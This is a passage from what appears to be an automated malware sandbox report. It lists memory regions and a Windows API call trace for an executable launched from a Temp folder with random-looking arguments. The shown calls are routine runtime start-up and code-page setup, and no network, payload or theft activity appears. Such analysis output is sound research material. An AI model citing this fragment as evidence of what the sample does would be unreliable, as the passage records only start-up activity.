AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4737 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4738 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4739 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4740 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "wtsk8wxh.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe") Region: id = 4741 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4742 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4743 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4744 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 4745 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4746 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4747 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4748 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4749 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4750 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4751 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4752 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4753 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4754 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4755 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4756 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4757 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4758 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4759 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4760 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4802 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4803 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4804 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4805 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 4806 start_va = 0x11f0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4906 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4907 start_va = 0x12e0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 5009 start_va = 0x11f0000 end_va = 0x12cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 5010 start_va = 0x12d0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 5011 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5012 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5013 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 49 os_tid = 0xca8 [0107.767] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x7e3d6b00, dwHighDateTime=0x1d440a9)) [0107.767] GetCurrentProcessId () returned 0xca4 [0107.767] GetCurrentThreadId () returned 0xca8 [0107.767] GetTickCount () returned 0x25c90 [0107.767] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16455591682) returned 1 [0107.767] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0107.767] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0107.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.769] GetCurrentThreadId () returned 0xca8 [0107.769] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12d07d0)) [0107.769] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0107.769] GetFileType (hFile=0x3) returned 0x0 [0107.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.770] GetFileType (hFile=0x7) returned 0x0 [0107.770] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.770] GetFileType (hFile=0xb) returned 0x0 [0107.770] SetHandleCount (uNumber=0x20) returned 0x20 [0107.770] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.770] GetEnvironmentStringsW () returned 0x22fce8* [0107.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0107.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12d11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0107.770] FreeEnvironmentStringsW (penv=0x22fce8) returned 1 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetACP () returned 0x4e4 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] IsValidCodePage (CodePage=0x4e4) returned 1 [0107.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0107.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0107.771] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0107.771] GetLastError () returned 0x6 [0107.771] SetLastError (dwErrCode=0x6) [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ") returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0107.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdc\xb7\x3a\xaa\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0107.771] GetLastError () returned 0x6 [0107.771] SetLastError (dwErrCode=0x6) [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ") returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0107.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\